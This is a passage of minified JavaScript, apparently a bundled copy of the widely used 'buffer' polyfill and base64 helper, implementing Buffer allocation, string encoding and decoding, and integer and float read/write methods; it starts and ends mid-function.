S=w.indexOf("=");return-1===S&&(S=x),[S,S===x?0:4-S%4]}function D(w,x,S){for(var U,K=[],ee=x;ee<S;ee+=3)K.push(E[(U=(w[ee]<<16&16711680)+(w[ee+1]<<8&65280)+(255&w[ee+2]))>>18&63]+E[U>>12&63]+E[U>>6&63]+E[63&U]);return K.join("")}g["-".charCodeAt(0)]=62,g["_".charCodeAt(0)]=63},8764:(Q,F,E)=>{"use strict";const g=E(9742),b=E(645),_="function"==typeof Symbol&&"function"==typeof Symbol.for?Symbol.for("nodejs.util.inspect.custom"):null;F.Buffer=p,F.SlowBuffer=function(xe){return+xe!=xe&&(xe=0),p.alloc(+xe)},F.INSPECT_MAX_BYTES=50;const y=2147483647;function M(xe){if(xe>y)throw new RangeError('The value "'+xe+'" is invalid for option "size"');const We=new Uint8Array(xe);return Object.setPrototypeOf(We,p.prototype),We}function p(xe,We,Je){if("number"==typeof xe){if("string"==typeof We)throw new TypeError('The "string" argument must be of type string. Received type number');return x(xe)}return D(xe,We,Je)}function D(xe,We,Je){if("string"==typeof xe)return function(Le,$e){if("string"==typeof $e&&""!==$e||($e="utf8"),!p.isEncoding($e))throw new TypeError("Unknown encoding: "+$e);const st=0|K(Le,$e);let xt=M(st);const pt=xt.write(Le,$e);return pt!==st&&(xt=xt.slice(0,pt)),xt}(xe,We);if(ArrayBuffer.isView(xe))return function(Le){if(Qe(Le,Uint8Array)){const $e=new Uint8Array(Le);return O($e.buffer,$e.byteOffset,$e.byteLength)}return S(Le)}(xe);if(null==xe)throw new TypeError("The first argument must be one of type string, Buffer, ArrayBuffer, Array, or Array-like Object. Received type "+typeof xe);if(Qe(xe,ArrayBuffer)||xe&&Qe(xe.buffer,ArrayBuffer)||"undefined"!=typeof SharedArrayBuffer&&(Qe(xe,SharedArrayBuffer)||xe&&Qe(xe.buffer,SharedArrayBuffer)))return O(xe,We,Je);if("number"==typeof xe)throw new TypeError('The "value" argument must not be of type number. Received type number');const Oe=xe.valueOf&&xe.valueOf();if(null!=Oe&&Oe!==xe)return p.from(Oe,We,Je);const Te=function(Le){if(p.isBuffer(Le)){const $e=0|U(Le.length),st=M($e);return 0===st.length||Le.copy(st,0,0,$e),st}return void 0!==Le.length?"number"!=typeof Le.length||ht(Le.length)?M(0):S(Le):"Buffer"===Le.type&&Array.isArray(Le.data)?S(Le.data):void 0}(xe);if(Te)return Te;if("undefined"!=typeof Symbol&&null!=Symbol.toPrimitive&&"function"==typeof xe[Symbol.toPrimitive])return p.from(xe[Symbol.toPrimitive]("string"),We,Je);throw new TypeError("The first argument must be one of type string, Buffer, ArrayBuffer, Array, or Array-like Object. Received type "+typeof xe)}function w(xe){if("number"!=typeof xe)throw new TypeError('"size" argument must be of type number');if(xe<0)throw new RangeError('The value "'+xe+'" is invalid for option "size"')}function x(xe){return w(xe),M(xe<0?0:0|U(xe))}function S(xe){const We=xe.length<0?0:0|U(xe.length),Je=M(We);for(let Oe=0;Oe<We;Oe+=1)Je[Oe]=255&xe[Oe];return Je}function O(xe,We,Je){if(We<0||xe.byteLength<We)throw new RangeError('"offset" is outside of buffer bounds');if(xe.byteLength<We+(Je||0))throw new RangeError('"length" is outside of buffer bounds');let Oe;return Oe=void 0===We&&void 0===Je?new Uint8Array(xe):void 0===Je?new Uint8Array(xe,We):new Uint8Array(xe,We,Je),Object.setPrototypeOf(Oe,p.prototype),Oe}function U(xe){if(xe>=y)throw new RangeError("Attempt to allocate Buffer larger than maximum size: 0x"+y.toString(16)+" bytes");return 0|xe}function K(xe,We){if(p.isBuffer(xe))return xe.length;if(ArrayBuffer.isView(xe)||Qe(xe,ArrayBuffer))return xe.byteLength;if("string"!=typeof xe)throw new TypeError('The "string" argument must be one of type string, Buffer, or ArrayBuffer. Received type '+typeof xe);const Je=xe.length,Oe=arguments.length>2&&!0===arguments[2];if(!Oe&&0===Je)return 0;let Te=!1;for(;;)switch(We){case"ascii":case"latin1":case"binary":return Je;case"utf8":case"utf-8":return Ke(xe).length;case"ucs2":case"ucs-2":case"utf16le":case"utf-16le":return 2*Je;case"hex":return Je>>>1;case"base64":return rt(xe).length;default:if(Te)return Oe?-1:Ke(xe).length;We=(""+We).toLowerCase(),Te=!0}}function ee(xe,We,Je){let Oe=!1;if((void 0===We||We<0)&&(We=0),We>this.length||((void 0===Je||Je>this.length)&&(Je=this.length),Je<=0)||(Je>>>=0)<=(We>>>=0))return"";for(xe||(xe="utf8");;)switch(xe){case"hex":return h(this,We,Je);case"utf8":case"utf-8":return P(this,We,Je);case"ascii":return X(this,We,Je);case"latin1":case"binary":return L(this,We,Je);case"base64":return v(this,We,Je);case"ucs2":case"ucs-2":case"utf16le":case"utf-16le":return R(this,We,Je);default:if(Oe)throw new TypeError("Unknown encoding: "+xe);xe=(xe+"").toLowerCase(),Oe=!0}}function se(xe,We,Je){const Oe=xe[We];xe[We]=xe[Je],xe[Je]=Oe}function ve(xe,We,Je,Oe,Te){if(0===xe.length)return-1;if("string"==typeof Je?(Oe=Je,Je=0):Je>2147483647?Je=2147483647:Je<-2147483648&&(Je=-2147483648),ht(Je=+Je)&&(Je=Te?0:xe.length-1),Je<0&&(Je=xe.length+Je),Je>=xe.length){if(Te)return-1;Je=xe.length-1}else if(Je<0){if(!Te)return-1;Je=0}if("string"==typeof We&&(We=p.from(We,Oe)),p.isBuffer(We))return 0===We.length?-1:le(xe,We,Je,Oe,Te);if("number"==typeof We)return We&=255,"function"==typeof Uint8Array.prototype.indexOf?Te?Uint8Array.prototype.indexOf.call(xe,We,Je):Uint8Array.prototype.lastIndexOf.call(xe,We,Je):le(xe,[We],Je,Oe,Te);throw new TypeError("val must be string, number or Buffer")}function le(xe,We,Je,Oe,Te){let Le,$e=1,st=xe.length,xt=We.length;if(void 0!==Oe&&("ucs2"===(Oe=String(Oe).toLowerCase())||"ucs-2"===Oe||"utf16le"===Oe||"utf-16le"===Oe)){if(xe.length<2||We.length<2)return-1;$e=2,st/=2,xt/=2,Je/=2}function pt(vt,Wi){return 1===$e?vt[Wi]:vt.readUInt16BE(Wi*$e)}if(Te){let vt=-1;for(Le=Je;Le<st;Le++)if(pt(xe,Le)===pt(We,-1===vt?0:Le-vt)){if(-1===vt&&(vt=Le),Le-vt+1===xt)return vt*$e}else-1!==vt&&(Le-=Le-vt),vt=-1}else for(Je+xt>st&&(Je=st-xt),Le=Je;Le>=0;Le--){let vt=!0;for(let Wi=0;Wi<xt;Wi++)if(pt(xe,Le+Wi)!==pt(We,Wi)){vt=!1;break}if(vt)return Le}return-1}function ye(xe,We,Je,Oe){Je=Number(Je)||0;const Te=xe.length-Je;Oe?(Oe=Number(Oe))>Te&&(Oe=Te):Oe=Te;const Le=We.length;let $e;for(Oe>Le/2&&(Oe=Le/2),$e=0;$e<Oe;++$e){const st=parseInt(We.substr(2*$e,2),16);if(ht(st))return $e;xe[Je+$e]=st}return $e}function z(xe,We,Je,Oe){return Ge(Ke(We,xe.length-Je),xe,Je,Oe)}function l(xe,We,Je,Oe){return Ge(function(Te){const Le=[];for(let $e=0;$e<Te.length;++$e)Le.push(255&Te.charCodeAt($e));return Le}(We),xe,Je,Oe)}function f(xe,We,Je,Oe){return Ge(rt(We),xe,Je,Oe)}function A(xe,We,Je,Oe){return Ge(function(Te,Le){let $e,st,xt;const pt=[];for(let vt=0;vt<Te.length&&!((Le-=2)<0);++vt)$e=Te.charCodeAt(vt),st=$e>>8,xt=$e%256,pt.push(xt),pt.push(st);return pt}(We,xe.length-Je),xe,Je,Oe)}function v(xe,We,Je){return g.fromByteArray(0===We&&Je===xe.length?xe:xe.slice(We,Je))}function P(xe,We,Je){Je=Math.min(xe.length,Je);const Oe=[];let Te=We;for(;Te<Je;){const Le=xe[Te];let $e=null,st=Le>239?4:Le>223?3:Le>191?2:1;if(Te+st<=Je){let xt,pt,vt,Wi;switch(st){case 1:Le<128&&($e=Le);break;case 2:xt=xe[Te+1],128==(192&xt)&&(Wi=(31&Le)<<6|63&xt,Wi>127&&($e=Wi));break;case 3:xt=xe[Te+1],pt=xe[Te+2],128==(192&xt)&&128==(192&pt)&&(Wi=(15&Le)<<12|(63&xt)<<6|63&pt,Wi>2047&&(Wi<55296||Wi>57343)&&($e=Wi));break;case 4:xt=xe[Te+1],pt=xe[Te+2],vt=xe[Te+3],128==(192&xt)&&128==(192&pt)&&128==(192&vt)&&(Wi=(15&Le)<<18|(63&xt)<<12|(63&pt)<<6|63&vt,Wi>65535&&Wi<1114112&&($e=Wi))}}null===$e?($e=65533,st=1):$e>65535&&($e-=65536,Oe.push($e>>>10&1023|55296),$e=56320|1023&$e),Oe.push($e),Te+=st}return function(Le){const $e=Le.length;if($e<=G)return String.fromCharCode.apply(String,Le);let st="",xt=0;for(;xt<$e;)st+=String.fromCharCode.apply(String,Le.slice(xt,xt+=G));return st}(Oe)}F.kMaxLength=y,(p.TYPED_ARRAY_SUPPORT=function(){try{const xe=new Uint8Array(1),We={foo:function(){return 42}};return Object.setPrototypeOf(We,Uint8Array.prototype),Object.setPrototypeOf(xe,We),42===xe.foo()}catch(xe){return!1}}())||"undefined"==typeof console||"function"!=typeof console.error||console.error("This browser lacks typed array (Uint8Array) support which is required by `buffer` v5.x. Use `buffer` v4.x if you require old browser support."),Object.defineProperty(p.prototype,"parent",{enumerable:!0,get:function(){if(p.isBuffer(this))return this.buffer}}),Object.defineProperty(p.prototype,"offset",{enumerable:!0,get:function(){if(p.isBuffer(this))return this.byteOffset}}),p.poolSize=8192,p.from=function(xe,We,Je){return D(xe,We,Je)},Object.setPrototypeOf(p.prototype,Uint8Array.prototype),Object.setPrototypeOf(p,Uint8Array),p.alloc=function(xe,We,Je){return Te=We,Le=Je,w(Oe=xe),Oe<=0?M(Oe):void 0!==Te?"string"==typeof Le?M(Oe).fill(Te,Le):M(Oe).fill(Te):M(Oe);var Oe,Te,Le},p.allocUnsafe=function(xe){return x(xe)},p.allocUnsafeSlow=function(xe){return x(xe)},p.isBuffer=function(xe){return null!=xe&&!0===xe._isBuffer&&xe!==p.prototype},p.compare=function(xe,We){if(Qe(xe,Uint8Array)&&(xe=p.from(xe,xe.offset,xe.byteLength)),Qe(We,Uint8Array)&&(We=p.from(We,We.offset,We.byteLength)),!p.isBuffer(xe)||!p.isBuffer(We))throw new TypeError('The "buf1", "buf2" arguments must be one of type Buffer or Uint8Array');if(xe===We)return 0;let Je=xe.length,Oe=We.length;for(let Te=0,Le=Math.min(Je,Oe);Te<Le;++Te)if(xe[Te]!==We[Te]){Je=xe[Te],Oe=We[Te];break}return Je<Oe?-1:Oe<Je?1:0},p.isEncoding=function(xe){switch(String(xe).toLowerCase()){case"hex":case"utf8":case"utf-8":case"ascii":case"latin1":case"binary":case"base64":case"ucs2":case"ucs-2":case"utf16le":case"utf-16le":return!0;default:return!1}},p.concat=function(xe,We){if(!Array.isArray(xe))throw new TypeError('"list" argument must be an Array of Buffers');if(0===xe.length)return p.alloc(0);let Je;if(void 0===We)for(We=0,Je=0;Je<xe.length;++Je)We+=xe[Je].length;const Oe=p.allocUnsafe(We);let Te=0;for(Je=0;Je<xe.length;++Je){let Le=xe[Je];if(Qe(Le,Uint8Array))Te+Le.length>Oe.length?(p.isBuffer(Le)||(Le=p.from(Le)),Le.copy(Oe,Te)):Uint8Array.prototype.set.call(Oe,Le,Te);else{if(!p.isBuffer(Le))throw new TypeError('"list" argument must be an Array of Buffers');Le.copy(Oe,Te)}Te+=Le.length}return Oe},p.byteLength=K,p.prototype._isBuffer=!0,p.prototype.swap16=function(){const xe=this.length;if(xe%2!=0)throw new RangeError("Buffer size must be a multiple of 16-bits");for(let We=0;We<xe;We+=2)se(this,We,We+1);return this},p.prototype.swap32=function(){const xe=this.length;if(xe%4!=0)throw new RangeError("Buffer size must be a multiple of 32-bits");for(let We=0;We<xe;We+=4)se(this,We,We+3),se(this,We+1,We+2);return this},p.prototype.swap64=function(){const xe=this.length;if(xe%8!=0)throw new RangeError("Buffer size must be a multiple of 64-bits");for(let We=0;We<xe;We+=8)se(this,We,We+7),se(this,We+1,We+6),se(this,We+2,We+5),se(this,We+3,We+4);return this},p.prototype.toLocaleString=p.prototype.toString=function(){const xe=this.length;return 0===xe?"":0===arguments.length?P(this,0,xe):ee.apply(this,arguments)},p.prototype.equals=function(xe){if(!p.isBuffer(xe))throw new TypeError("Argument must be a Buffer");return this===xe||0===p.compare(this,xe)},p.prototype.inspect=function(){let xe="";const We=F.INSPECT_MAX_BYTES;return xe=this.toString("hex",0,We).replace(/(.{2})/g,"$1 ").trim(),this.length>We&&(xe+=" ... "),"<Buffer "+xe+">"},_&&(p.prototype[_]=p.prototype.inspect),p.prototype.compare=function(xe,We,Je,Oe,Te){if(Qe(xe,Uint8Array)&&(xe=p.from(xe,xe.offset,xe.byteLength)),!p.isBuffer(xe))throw new TypeError('The "target" argument must be one of type Buffer or Uint8Array. Received type '+typeof xe);if(void 0===We&&(We=0),void 0===Je&&(Je=xe?xe.length:0),void 0===Oe&&(Oe=0),void 0===Te&&(Te=this.length),We<0||Je>xe.length||Oe<0||Te>this.length)throw new RangeError("out of range index");if(Oe>=Te&&We>=Je)return 0;if(Oe>=Te)return-1;if(We>=Je)return 1;if(this===xe)return 0;let Le=(Te>>>=0)-(Oe>>>=0),$e=(Je>>>=0)-(We>>>=0);const st=Math.min(Le,$e),xt=this.slice(Oe,Te),pt=xe.slice(We,Je);for(let vt=0;vt<st;++vt)if(xt[vt]!==pt[vt]){Le=xt[vt],$e=pt[vt];break}return Le<$e?-1:$e<Le?1:0},p.prototype.includes=function(xe,We,Je){return-1!==this.indexOf(xe,We,Je)},p.prototype.indexOf=function(xe,We,Je){return ve(this,xe,We,Je,!0)},p.prototype.lastIndexOf=function(xe,We,Je){return ve(this,xe,We,Je,!1)},p.prototype.write=function(xe,We,Je,Oe){if(void 0===We)Oe="utf8",Je=this.length,We=0;else if(void 0===Je&&"string"==typeof We)Oe=We,Je=this.length,We=0;else{if(!isFinite(We))throw new Error("Buffer.write(string, encoding, offset[, length]) is no longer supported");We>>>=0,isFinite(Je)?(Je>>>=0,void 0===Oe&&(Oe="utf8")):(Oe=Je,Je=void 0)}const Te=this.length-We;if((void 0===Je||Je>Te)&&(Je=Te),xe.length>0&&(Je<0||We<0)||We>this.length)throw new RangeError("Attempt to write outside buffer bounds");Oe||(Oe="utf8");let Le=!1;for(;;)switch(Oe){case"hex":return ye(this,xe,We,Je);case"utf8":case"utf-8":return z(this,xe,We,Je);case"ascii":case"latin1":case"binary":return l(this,xe,We,Je);case"base64":return f(this,xe,We,Je);case"ucs2":case"ucs-2":case"utf16le":case"utf-16le":return A(this,xe,We,Je);default:if(Le)throw new TypeError("Unknown encoding: "+Oe);Oe=(""+Oe).toLowerCase(),Le=!0}},p.prototype.toJSON=function(){return{type:"Buffer",data:Array.prototype.slice.call(this._arr||this,0)}};const G=4096;function X(xe,We,Je){let Oe="";Je=Math.min(xe.length,Je);for(let Te=We;Te<Je;++Te)Oe+=String.fromCharCode(127&xe[Te]);return Oe}function L(xe,We,Je){let Oe="";Je=Math.min(xe.length,Je);for(let Te=We;Te<Je;++Te)Oe+=String.fromCharCode(xe[Te]);return Oe}function h(xe,We,Je){const Oe=xe.length;(!We||We<0)&&(We=0),(!Je||Je<0||Je>Oe)&&(Je=Oe);let Te="";for(let Le=We;Le<Je;++Le)Te+=mt[xe[Le]];return Te}function R(xe,We,Je){const Oe=xe.slice(We,Je);let Te="";for(let Le=0;Le<Oe.length-1;Le+=2)Te+=String.fromCharCode(Oe[Le]+256*Oe[Le+1]);return Te}function J(xe,We,Je){if(xe%1!=0||xe<0)throw new RangeError("offset is not uint");if(xe+We>Je)throw new RangeError("Trying to access beyond buffer length")}function Z(xe,We,Je,Oe,Te,Le){if(!p.isBuffer(xe))throw new TypeError('"buffer" argument must be a Buffer instance');if(We>Te||We<Le)throw new RangeError('"value" argument is out of bounds');if(Je+Oe>xe.length)throw new RangeError("Index out of range")}function ue(xe,We,Je,Oe,Te){De(We,Oe,Te,xe,Je,7);let Le=Number(We&BigInt(4294967295));xe[Je++]=Le,Le>>=8,xe[Je++]=Le,Le>>=8,xe[Je++]=Le,Le>>=8,xe[Je++]=Le;let $e=Number(We>>BigInt(32)&BigInt(4294967295));return xe[Je++]=$e,$e>>=8,xe[Je++]=$e,$e>>=8,xe[Je++]=$e,$e>>=8,xe[Je++]=$e,Je}function Ie(xe,We,Je,Oe,Te){De(We,Oe,Te,xe,Je,7);let Le=Number(We&BigInt(4294967295));xe[Je+7]=Le,Le>>=8,xe[Je+6]=Le,Le>>=8,xe[Je+5]=Le,Le>>=8,xe[Je+4]=Le;let $e=Number(We>>BigInt(32)&BigInt(4294967295));return xe[Je+3]=$e,$e>>=8,xe[Je+2]=$e,$e>>=8,xe[Je+1]=$e,$e>>=8,xe[Je]=$e,Je+8}function Ae(xe,We,Je,Oe,Te,Le){if(Je+Oe>xe.length)throw new RangeError("Index out of range");if(Je<0)throw new RangeError("Index out of range")}function Ue(xe,We,Je,Oe,Te){return We=+We,Je>>>=0,Te||Ae(xe,0,Je,4),b.write(xe,We,Je,Oe,23,4),Je+4}function Xe(xe,We,Je,Oe,Te){return We=+We,Je>>>=0,Te||Ae(xe,0,Je,8),b.write(xe,We,Je,Oe,52,8),Je+8}p.prototype.slice=function(xe,We){const Je=this.length;(xe=~~xe)<0?(xe+=Je)<0&&(xe=0):xe>Je&&(xe=Je),(We=void 0===We?Je:~~We)<0?(We+=Je)<0&&(We=0):We>Je&&(We=Je),We<xe&&(We=xe);const Oe=this.subarray(xe,We);return Object.setPrototypeOf(Oe,p.prototype),Oe},p.prototype.readUintLE=p.prototype.readUIntLE=function(xe,We,Je){xe>>>=0,We>>>=0,Je||J(xe,We,this.length);let Oe=this[xe],Te=1,Le=0;for(;++Le<We&&(Te*=256);)Oe+=this[xe+Le]*Te;return Oe},p.prototype.readUintBE=p.prototype.readUIntBE=function(xe,We,Je){xe>>>=0,We>>>=0,Je||J(xe,We,this.length);let Oe=this[xe+--We],Te=1;for(;We>0&&(Te*=256);)Oe+=this[xe+--We]*Te;return Oe},p.prototype.readUint8=p.prototype.readUInt8=function(xe,We){return xe>>>=0,We||J(xe,1,this.length),this[xe]},p.prototype.readUint16LE=p.prototype.readUInt16LE=function(xe,We){return xe>>>=0,We||J(xe,2,this.length),this[xe]|this[xe+1]<<8},p.prototype.readUint16BE=p.prototype.readUInt16BE=function(xe,We){return xe>>>=0,We||J(xe,2,this.length),this[xe]<<8|this[xe+1]},p.prototype.readUint32LE=p.prototype.readUInt32LE=function(xe,We){return xe>>>=0,We||J(xe,4,this.length),(this[xe]|this[xe+1]<<8|this[xe+2]<<16)+16777216*this[xe+3]},p.prototype.readUint32BE=p.prototype.readUInt32BE=function(xe,We){return xe>>>=0,We||J(xe,4,this.length),16777216*this[xe]+(this[xe+1]<<16|this[xe+2]<<8|this[xe+3])},p.prototype.readBigUInt64LE=lt(function(xe){Ve(xe>>>=0,"offset");const We=this[xe],Je=this[xe+7];void 0!==We&&void 0!==Je||ze(xe,this.length-8);const Oe=We+256*this[++xe]+65536*this[++xe]+this[++xe]*Lo(2,24),Te=this[++xe]+256*this[++xe]+65536*this[++xe]+Je*Lo(2,24);return BigInt(Oe)+(BigInt(Te)<<BigInt(32))}),p.prototype.readBigUInt64BE=lt(function(xe){Ve(xe>>>=0,"offset");const We=this[xe],Je=this[xe+7];void 0!==We&&void 0!==Je||ze(xe,this.length-8);const Oe=We*Lo(2,24)+65536*this[++xe]+256*this[++xe]+this[++xe],Te=this[++xe]*Lo(2,24)+65536*this[++xe]+256*this[++xe]+Je;return(BigInt(Oe)<<BigInt(32))+BigInt(Te)}),p.prototype.readIntLE=function(xe,We,Je){xe>>>=0,We>>>=0,Je||J(xe,We,this.length);let Oe=this[xe],Te=1,Le=0;for(;++Le<We&&(Te*=256);)Oe+=this[xe+Le]*Te;return Te*=128,Oe>=Te&&(Oe-=Math.pow(2,8*We)),Oe},p.prototype.readIntBE=function(xe,We,Je){xe>>>=0,We>>>=0,Je||J(xe,We,this.length);let Oe=We,Te=1,Le=this[xe+--Oe];for(;Oe>0&&(Te*=256);)Le+=this[xe+--Oe]*Te;return Te*=128,Le>=Te&&(Le-=Math.pow(2,8*We)),Le},p.prototype.readInt8=function(xe,We){return xe>>>=0,We||J(xe,1,this.length),128&this[xe]?-1*(255-this[xe]+1):this[xe]},p.prototype.readInt16LE=function(xe,We){xe>>>=0,We||J(xe,2,this.length);const Je=this[xe]|this[xe+1]<<8;return 32768&Je?4294901760|Je:Je},p.prototype.readInt16BE=function(xe,We){xe>>>=0,We||J(xe,2,this.length);const Je=this[xe+1]|this[xe]<<8;return 32768&Je?4294901760|Je:Je},p.prototype.readInt32LE=function(xe,We){return xe>>>=0,We||J(xe,4,this.length),this[xe]|this[xe+1]<<8|this[xe+2]<<16|this[xe+3]<<24},p.prototype.readInt32BE=function(xe,We){return xe>>>=0,We||J(xe,4,this.length),this[xe]<<24|this[xe+1]<<16|this[xe+2]<<8|this[xe+3]},p.prototype.readBigInt64LE=lt(function(xe){Ve(xe>>>=0,"offset");const We=this[xe],Je=this[xe+7];return void 0!==We&&void 0!==Je||ze(xe,this.length-8),(BigInt(this[xe+4]+256*this[xe+5]+65536*this[xe+6]+(Je<<24))<<BigInt(32))+BigInt(We+256*this[++xe]+65536*this[++xe]+16777216*this[++xe])}),p.prototype.readBigInt64BE=lt(function(xe){Ve(xe>>>=0,"offset");const We=this[xe],Je=this[xe+7];void 0!==We&&void 0!==Je||ze(xe,this.length-8);const Oe=(We<<24)+65536*this[++xe]+256*this[++xe]+this[++xe];return(BigInt(Oe)<<BigInt(32))+BigInt(16777216*this[++xe]+65536*this[++xe]+256*this[++xe]+Je)}),p.prototype.readFloatLE=function(xe,We){return xe>>>=0,We||J(xe,4,this.length),b.read(this,xe,!0,23,4)},p.prototype.readFloatBE=function(xe,We){return xe>>>=0,We||J(xe,4,this.length),b.read(this,xe,!1,23,4)},p.prototype.readDoubleLE=function(xe,We){return xe>>>=0,We||J(xe,8,this.length),b.read(this,xe,!0,52,8)},p.prototype.readDoubleBE=function(xe,We){return xe>>>=0,We||J(xe,8,this.length),b.read(this,xe,!1,52,8)},p.prototype.writeUintLE=p.prototype.writeUIntLE=function(xe,We,Je,Oe){xe=+xe,We>>>=0,Je>>>=0,Oe||Z(this,xe,We,Je,Math.pow(2,8*Je)-1,0);let Te=1,Le=0;for(this[We]=255&xe;++Le<Je&&(Te*=256);)this[We+Le]=xe/Te&255;return We+Je},p.prototype.writeUintBE=p.prototype.writeUIntBE=function(xe,We,Je,Oe){xe=+xe,We>>>=0,Je>>>=0,Oe||Z(this,xe,We,Je,Math.pow(2,8*Je)-1,0);let Te=Je-1,Le=1;for(this[We+Te]=255&xe;--Te>=0&&(Le*=256);)this[We+Te]=xe/Le&255;return We+Je},p.prototype.writeUint8=p.prototype.writeUInt8=function(xe,We,Je){return xe=+xe,We>>>=0,Je||Z(this,xe,We,1,255,0),this[We]=255&xe,We+1},p.prototype.writeUint16LE=p.prototype.writeUInt16LE=function(xe,We,Je){return xe=+xe,We>>>=0,Je||Z(this,xe,We,2,65535,0),this[We]=255&xe,this[We+1]=xe>>>8,We+2},p.prototype.writeUint16BE=p.prototype.writeUInt16BE=function(xe,We,Je){return xe=+xe,We>>>=0,Je||Z(this,xe,We,2,65535,0),this[We]=xe>>>8,this[We+1]=255&xe,We+2},p.prototype.writeUint32LE=p.prototype.writeUInt32LE=function(xe,We,Je){return xe=+xe,We>>>=0,Je||Z(this,xe,We,4,4294967295,0),this[We+3]=xe>>>24,this[We+2]=xe>>>16,this[We+1]=xe>>>8,this[We]=255&xe,We+4},p.prototype.writeUint32BE=p.prototype.writeUInt32BE=function(xe,We,Je){return xe=+xe,We>>>=0,Je||Z(this,xe,We,4,4294967295,0),this[We]=xe>>>24,this[We+1]=xe>>>16,this[We+2]=xe>>>8,this[We+3]=255&xe,We+4},p.prototype.writeBigUInt64LE=lt(function(xe,We=0){return ue(this,xe,We,BigInt(0),BigInt("0xffffffffffffffff"))}),p.prototype.writeBigUInt64BE=lt(function(xe,We=0){return Ie(this,xe,We,BigInt(0),BigInt("0xffffffffffffffff"))}),p.prototype.writeIntLE=function(xe,We,Je,Oe){if(xe=+xe,We>>>=0,!Oe){const st=Math.pow(2,8*Je-1);Z(this,xe,We,Je,st-1,-st)}let Te=0,Le=1,$e=0;for(this[We]=255&xe;++Te<Je&&(Le*=256);)xe<0&&0===$e&&0!==this[We+Te-1]&&($e=1),this[We+Te]=(xe/Le>>0)-$e&255;return We+Je},p.prototype.writeIntBE=function(xe,We,Je,Oe){if(xe=+xe,We>>>=0,!Oe){const st=Math.pow(2,8*Je-1);Z(this,xe,We,Je,st-1,-st)}let Te=Je-1,Le=1,$e=0;for(this[We+Te]=255&xe;--Te>=0&&(Le*=256);)xe<0&&0===$e&&0!==this[We+Te+1]&&($e=1),this[We+Te]=(xe/Le>>0)-$e&255;return We+Je},p.prototype.writeInt8=function(xe,We,Je){return xe=+xe,We>>>=0,Je||Z(this,xe,We,1,127,-128),xe<0&&(xe=255+xe+1),this[We]=255&xe,We+1},p.prototype.writeInt16LE=function(xe,We,Je){return xe=+xe,We>>>=0,Je||Z(this,xe,We,2,32767,-32768),this[We]=255&xe,this[We+1]=xe>>>8,We+2},p.prototype.writeInt16BE=function(xe,We,Je){return xe=+xe,We>>>=0,Je||Z(this,xe,We,2,32767,-32768),this[We]=xe>>>8,this[We+1]=255&xe,We+2},p.prototype.writeInt32LE=function(xe,We,Je){return xe=+xe,We>>>=0,Je||Z(this,xe,We,4,2147483647,-2147483648),this[We]=255&xe,this[We+1]=xe>>>8,this[We+2]=xe>>>16,this[We+3]=xe>>>24,We+4},p.prototype.writeInt32BE=function(xe,We,Je){return xe=+xe,We>>>=0,Je||Z(this,xe,We,4,2147483647,-2147483648),xe<0&&(xe=4294967295+xe+1),this[We]=xe>>>24,this[We+1]=xe>>>16,this[We+2]=xe>>>8,this[We+3]=255&xe,We+4},p.prototype.writeBigInt64LE=lt(function(xe,We=0){return ue(this,xe,We,-BigInt("0x8000000000000000"),BigInt("0x7fffffffffffffff"))}),p.prototype.writeBigInt64BE=lt(function(xe,We=0){return Ie(this,xe,We,-BigInt("0x8000000000000000"),BigInt("0x7fffffffffffffff"))}),p.prototype.writeFloatLE=function(xe,We,Je){return Ue(this,xe,We,!0,Je)},p.prototype.writeFloatBE=function(xe,We,Je){return Ue(this,xe,We,!1,Je)},p.prototype.writeDoubleLE=function(xe,We,Je){return Xe(this,xe,We,!0,Je)},p.prototype.writeDoubleBE=function(xe,We,Je){return Xe(this,xe,We,!1,Je)},p.prototype.copy=function(xe,We,Je,Oe){if(!p.isBuffer(xe))throw new TypeError("argument should be a Buffer");if(Je||(Je=0),Oe||0===Oe||(Oe=this.length),We>=xe.length&&(We=xe.length),We||(We=0),Oe>0&&Oe<Je&&(Oe=Je),Oe===Je||0===xe.length||0===this.length)return 0;if(We<0)throw new RangeError("targetStart out of bounds");if(Je<0||Je>=this.length)throw new RangeError("Index out of range");if(Oe<0)throw new RangeError("sourceEnd out of bounds");Oe>this.length&&(Oe=this.length),xe.length-We<Oe-Je&&(Oe=xe.length-We+Je);const Te=Oe-Je;return this===xe&&"function"==typeof Uint8Array.prototype.copyWithin?this.copyWithin(We,Je,Oe):Uint8Array.prototype.set.call(xe,this.subarray(Je,Oe),We),Te},p.prototype.fill=function(xe,We,Je,Oe){if("string"==typeof xe){if("string"==typeof We?(Oe=We,We=0,Je=this.length):"string"==typeof Je&&(Oe=Je,Je=this.length),void 0!==Oe&&"string"!=typeof Oe)throw new TypeError("encoding must be a string");if("string"==typeof Oe&&!p.isEncoding(Oe))throw new TypeError("Unknown encoding: "+Oe);if(1===xe.length){const Le=xe.charCodeAt(0);("utf8"===Oe&&Le<128||"latin1"===Oe)&&(xe=Le)}}else"number"==typeof xe?xe&=255:"boolean"==typeof xe&&(xe=Number(xe));if(We<0||this.length<We||this.length<Je)throw new RangeError("Out of range index");if(Je<=We)return this;let Te;if(We>>>=0,Je=void 0===Je?this.length:Je>>>0,xe||(xe=0),"number"==typeof xe)for(Te=We;Te<Je;++Te)this[Te]=xe;else{const Le=p.isBuffer(xe)?xe:p.from(xe,Oe),$e=Le.length;if(0===$e)throw new TypeError('The value "'+xe+'" is invalid for argument "value"');for(Te=0;Te<Je-We;++Te)this[Te+We]=Le[Te%$e]}return this};const He={};function Be(xe,We,Je){He[xe]=class extends Je{constructor(){super(),Object.defineProperty(this,"message",{value:We.apply(this,arguments),writable:!0,configurable:!0}),this.name=`${this.name} [${xe}]`,delete this.name}get code(){return xe}set code(Oe){Object.defineProperty(this,"code",{configurable:!0,enumerable:!0,value:Oe,writable:!0})}toString(){return`${this.name} [${xe}]: ${this.message}`}}}function qe(xe){let We="",Je=xe.length;const Oe="-"===xe[0]?1:0;for(;Je>=Oe+4;Je-=3)We=`_${xe.slice(Je-3,Je)}${We}`;return`${xe.slice(0,Je)}${We}`}function De(xe,We,Je,Oe,Te,Le){if(xe>Je||xe<We){const $e="bigint"==typeof We?"n":"";let st;throw st=Le>3?0===We||We===BigInt(0)?`>= 0${$e} and < 2${$e} ** ${8*(Le+1)}${$e}`:`>= -(2${$e} ** ${8*(Le+1)-1}${$e}) and < 2 ** ${8*(Le+1)-1}${$e}`:`>= ${We}${$e} and <= ${Je}${$e}`,new He.ERR_OUT_OF_RANGE("value",st,xe)}var $e,st,xt;$e=Oe,xt=Le,Ve(st=Te,"offset"),void 0!==$e[st]&&void 0!==$e[st+xt]||ze(st,$e.length-(xt+1))}function Ve(xe,We){if("number"!=typeof xe)throw new 